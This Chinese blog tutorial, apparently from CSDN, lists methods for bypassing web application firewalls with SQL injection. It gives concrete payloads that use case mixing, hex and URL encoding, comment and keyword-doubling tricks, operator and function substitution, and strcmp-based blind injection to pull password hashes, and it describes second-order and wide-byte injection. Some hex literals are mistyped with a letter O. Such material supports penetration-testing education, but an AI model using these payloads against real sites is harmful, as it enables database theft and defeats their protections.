WAF绕过常见方法

        前面写了WAF如何检测,现在直接上WAF常见的一些绕过方法。

方法1:变换大小写

实例:

         比如WAF拦截了union,那就使用Union、UnloN等方式绕过。

方法2:编码绕过

实例1:

        WAF检测敏感字~,则可以用Ox7e代替,如extractvalue(1,concat('~'.database())可以写成extractvalue(1,concat(Ox7e,database())).

实例2:

        WAF检测敏感字"admin',则可以用Ox61646d696e代替,如select name,passfrom userswhere name='admin'可以替换成select name,pass from users where name=Ox61646d696e.

实例3:

        WAF检测敏感字select,可以在URL中将select变成%73elEcT编码结合大小写变换绕过WAF。实例4:可以用%09、%0a、%0b、%Oc、%0d、%a0、!**1、/*somewords*/等来替换空格。

方法3:利用注释符

        适用于WAF只过滤了一次危险的语句,而没有阻断整个查询语句的场合。

实例:

        原查询语句为:?id=1 union select 1,2,3,对于这条查询,WAF过滤了一次union和select,我们可以用内敛注释符注释掉里面的过滤掉,如?id=1/*union*/union /*select*/select 1,2,3

方法4:重写

        适用于WAF只过滤—次敏感字的情况。

实例:

        WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行我们的查询了:?id=1 ununionion select 1,2,3

方法5:比较操作符替换

        适用于某—比较操作符(如等号)被过滤的情况。

实例1:

        !=不等于,>不等于,<小于,>大于,这些都可以用来替换=来绕过。

        比如要判断某个值是不是74,假设=被过滤,则可以判断是不是大于73,是不是小于75,然后就知道是74了:/?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1))>73

                        /?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))<75

实例2:

        WAF将=、>、<全部过滤,则可以利用like来绕过,如?id=1' or 1 like 1

方法6:同功能函数替换

        适用于某—函数被过滤的情况。

实例:

        假如substring()被WAF过滤,但substring()可以用同功能的mid(),substr()等函数来替换,都是用来取字符串的某—位字符的。

        原查询语句: substring((select 'password'),1,1)= Ox70替换后的查询语句:

        substr((select 'password'),1,1)= Ox70mid((select 'password'),1,1) = Ox70

方法7:盲注的活用

        适用于页面无回显或多种函数、逻辑运算符被过滤的情况。实例: strcmp(expr1,expr2)用来比较两个值,如果expr1=expr2,则函数返回0,expr1<expr2则返回-1,expr1>expr2则返回1。

        假如index.php?uid=123页面返回是正确的,但WAF过滤了and和or ,

        原查询语句index.php?uid=123 and left((select hash from users limit 0,1),1)='B',可用

index.php?uid=strcmp(left((select hash from users limit 0,1).1),0x42)+123来替换,通过盲猜hash的第一位,如果第一位等于Ox42也就是B,那么strcmp()将返回0,0+123=123,所以页面应该是正确的。否则就说明不是B,这样猜就不用and和or了.

方法8:二阶注入

        所谓二阶注入(又称存储型注入)是指已存储(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致的注入。

        普通SQL注入:

        发生在一个HTTP请求和响应中,对系统的攻击是立即执行的:

        (1)攻击者在http请求中提交非法输入;

        (2)应用程序处理非法输入,使用非法输入构造SQL语句;(3)在攻击过程中向攻击者返回结果。

        二阶SQL注入:

        (1)攻击者在http请求中提交某种经过构思的输入

        (2)应用程序存储该恶意输入(通常保存在数据库中)以便后面使用并响应请求;(3)攻击者提交第二次(不同的)http请求;

        (4)为处理第二次http请求,程序会检索存储在数据库中的恶意输入并进行处理,从而导致攻击者构造的SQL查询被执行;

        (5)如果攻击成功,在第二次请求响应中向攻击者返回查询结果。

方法9:密字节注入

        适用于数据库使用双字节编码方式(如GBK)、WAF利用AddSlashes()等函数对敏感字符进行转义的场景.

  • 10
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

失之一灵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值